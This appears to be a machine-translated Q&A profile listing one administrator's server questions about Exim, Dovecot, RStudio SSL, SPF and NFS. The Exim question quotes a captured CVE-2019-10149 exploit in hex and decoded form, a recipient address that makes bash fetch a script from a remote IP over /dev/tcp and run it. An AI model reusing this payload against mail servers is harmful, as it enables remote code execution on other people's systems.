Skippy le Grand Gourou's questions

在我的 Debian 稳定服务器上将 Exim4 升级到修复CVE-2019-10149漏洞（即exim4_4.89-2+deb9u4 ）的官方补丁版本后，我仍然收到有关可疑电子邮件的“消息冻结”警告。

是预期的，还是应该默默地丢弃这些可疑的电子邮件？我似乎无法理解补丁是如何影响这种行为的——我认为这样的电子邮件会触发这种!parse_extract_address(…)情况，因此会被记录并被拒绝，但事实似乎并非如此？

我突然从我的服务器（Exim 4.89，Debian stable）收到了一些奇怪的“消息冻结”电子邮件：

消息 1hcbPR-0005t1-2r 已被冻结（传递错误消息）。

发件人是<>。

以下地址尚未送达：

root+${运行{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\ x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\ x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\ x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@ localhost：太多“已接收”标头 - 可疑邮件循环

$ sudo exim4 -Mvb 1hcbPR-0005t1-2r
1hcbPR-0005t1-2r-D
$ sudo exim4 -Mvh 1hcbPR-0005t1-2r
1hcbPR-0005t1-2r-H
Debian-exim 101 103
<>
1560715549 0
-helo_name localhost
-host_address 163.172.157.143.51642
-interface_address <MY.IP>.25
-received_protocol smtp
-body_linecount 0
-max_received_linelength 12
-frozen 1560715549
-host_lookup_failed
XX
1
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost

569P Received: from [163.172.157.143] (helo=localhost)
    by myserver.example.org with smtp (Exim 4.89)
    id 1hcbPR-0005t1-2r
    for root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost; Sun, 16 Jun 2019 22:05:49 +0200
012P Received: 1
012P Received: 2
012P Received: 3
012P Received: 4
012P Received: 5
012P Received: 6
012P Received: 7
012P Received: 8
012P Received: 9
013P Received: 10
013P Received: 11
013P Received: 12
013P Received: 13
013P Received: 14
013P Received: 15
013P Received: 16
013P Received: 17
013P Received: 18
013P Received: 19
013P Received: 20
013P Received: 21
013P Received: 22
013P Received: 23
013P Received: 24
013P Received: 25
013P Received: 26
013P Received: 27
013P Received: 28
013P Received: 29
013P Received: 30
013P Received: 31

它看起来像代码注入，但我不明白，它看起来对我没有太大危害：

root+${run{/bin/bash -c "exec 5<>/dev/tcp/51.38.133.232/80;echo -e 'GET / HTTP/1.0\n' >&5;tail -n +11 <&5 | bash" &}}@localhost: Too many "Received" headers - suspected mail loop

所有消息都是相似的，具有不同的 IP 地址和端口。他们都来自同一个地址。

它是一种已知的感染吗？

我有一个电子邮件服务器设置为使用 dovecot 和虚拟用户：

passdb {
  driver = passwd-file
  args = username_format=%n /etc/vmail/%d/users
}

userdb {
  driver = static
  args = uid=109 gid=111 home=/home/vmail/%d/%n
}

现在我需要为一些用户设置存储配额。显然这对驱动程序来说是不可能的static，所以我想最简单的启用它的方法是切换到passwd-file. 但是我很难让它真正发挥作用。

使用与passdb上述相同的方法和

userdb {
  driver = passwd-file
  args = username_format=%n /etc/vmail/%d/users
  default_fields = uid=vmail gid=vmail home=/home/vmail/%d/%n
}

93.184.216.34 我收到以下错误：

dovecot：imap：错误：未从 userdb 中找到经过身份验证的用户，auth 查找 id=345505793（client-pid=30121 client-id=1）

dovecot: auth: 错误: passwd-file([email protected],93.184.216.34,): user not found from userdb

我尝试了许多变体并阅读了 dovecot wiki 的许多页面，包括AuthDatabase/PasswdFile，但我似乎无法正确解释文档。

如何将我的static配置转换为passwd-file修改最少的配置？

/etc/vmail/%d/users文件是标准格式

user:{SHA512}…

这是dovecot userdb这些设置的输出：

userdb {
  args = username_format=%n /etc/vmail/%d/users
  auth_verbose = default
  default_fields = uid=vmail gid=vmail home=/home/vmail/%d/%n
  driver = passwd-file
  name = 
  override_fields = 
  result_failure = continue
  result_internalfail = continue
  result_success = return-ok
  skip = never
}

我在 AWS EC2 实例上安装了rstudio-server 。一切顺利，但尝试访问时https://myawsserver.example.org:8787出现以下错误：

安全连接失败

连接 XX.XX.XX.XX:8787 时出错。SSL 收到超过最大允许长度的记录。错误代码：SSL_ERROR_RX_RECORD_TOO_LONG

我在日志或任何地方都找不到任何问题。怎么了 ？

我正在尝试在 VPS 上的电子邮件服务器上设置 SPF/DKIM/DMARC。这是我的 DNS 配置（为了便于阅读，删除了 DKIM 和 DMARC）：

@                       28800  A      X.X.X.X
@                       28800  MX     10 smtp.example.com.
smtp                    28800  A      X.X.X.X
www                     28800  A      X.X.X.X
@                       28800  TXT    "v=spf1 ip4:X.X.X.X -all"
smtp.example.com.       28800  TXT    "v=spf1 ip4:X.X.X.X  -all"
www.example.com.        28800  TXT    "v=spf1 -all"

电子邮件似乎有效，并且 port25.com 报告没有错误：

==========================================================
Summary of Results
==========================================================
SPF check:          pass
DomainKeys check:   neutral
DKIM check:         pass
SpamAssassin check: ham

然而，雅虎报告 SPF 失败：

<?xml version="1.0"?>   
<feedback>      
  <report_metadata>     
    <org_name>Yahoo! Inc.</org_name>    
    <email>[email protected]</email>   
    <report_id>1484621522.715243</report_id>    
    <date_range>        
      <begin>1484524800</begin> 
      <end>1484611199 </end>    
    </date_range>       
  </report_metadata>    
  <policy_published>    
    <domain>example.com</domain>  
    <adkim>s</adkim>    
    <aspf>s</aspf>      
    <p>reject</p>       
    <pct>100</pct>      
  </policy_published>   
  <record>      
    <row>       
      <source_ip>X.X.X.X</source_ip>      
      <count>7</count>  
      <policy_evaluated>        
        <disposition>none</disposition> 
        <dkim>pass</dkim>       
        <spf>fail</spf> 
      </policy_evaluated>       
    </row>      
    <identifiers>       
      <header_from>example.com</header_from>      
    </identifiers>      
    <auth_results>      
      <dkim>    
        <domain>example.com</domain>      
        <result>pass</result>   
      </dkim>   
      <spf>     
        <domain>myVPS.provider.com</domain>      
        <result>none</result>   
      </spf>    
    </auth_results>     
  </record>     
</feedback>

雅虎似乎正在检查 HELO 名称（此处myVPS.provider.com），尽管它与发送域具有相同的 IP 地址，但没有 SPF 记录（我无法自己编辑其 DNS 配置）。

如果我的 VPS 提供商将以下内容添加到 DNS 配置中，它会解决问题myVPS.provider.com 吗？

myVPS.provider.com.  IN TXT  "v=spf1 ip4:X.X.X.X  -all"

还有其他选择吗？

不确定它是否更适合unix 和 linux板的超级用户，请告诉我。

我们有一台服务器，它是某种大型架构的主要关键点之一。该服务器有一个未使用的备份磁盘，尽管它托管了非常旧的备份。所以我决定设置它，虽然它在开始时是一个单独的分区，但我曾经fdisk以与主驱动器相同的方式对其进行重新分区（两者都是相同的）。

不幸的是，在重新分区后fdisk无法让内核看到新的分区表，也不能partrobe，blockdev或者sfdisk。所有人都面临着同样的问题 : BLKRRPART: Device or resource busy，尽管使用该设备既没有lsof也fuser没有显示任何内容。在这里我不得不提一下，我曾经umount -l在使用之前强制卸载fdisk（是的，现在看起来很愚蠢，我应该更仔细地阅读文档）。

后来我发现 NFS 正在共享驱动器的一个目录，这就是它没有出现的原因lsof——fuser不要问我谁有使用旧备份驱动器中的目录来共享启动配置文件的愚蠢想法对于 NFS 客户端……

我无法重新启动此服务器，也不会重新启动 NFS。我读过我可以nfs-kernel-server reload在重新加载时使用 NFS 传输/etc/exports（如果我理解正确的话），但首先我不确定这是否有效，其次我真的不想尝试。我真的很想避免干扰正在运行的进程。

现在，如果该目录确实出现在的输出中showmount -e（看起来与 基本相同/etc/exports），它既不出现在showmount -a也不出现在showmount -d. 我想这意味着该目录未被使用，所以也许有某种方法可以强制从 NFS 卸载？

有什么建议么 ？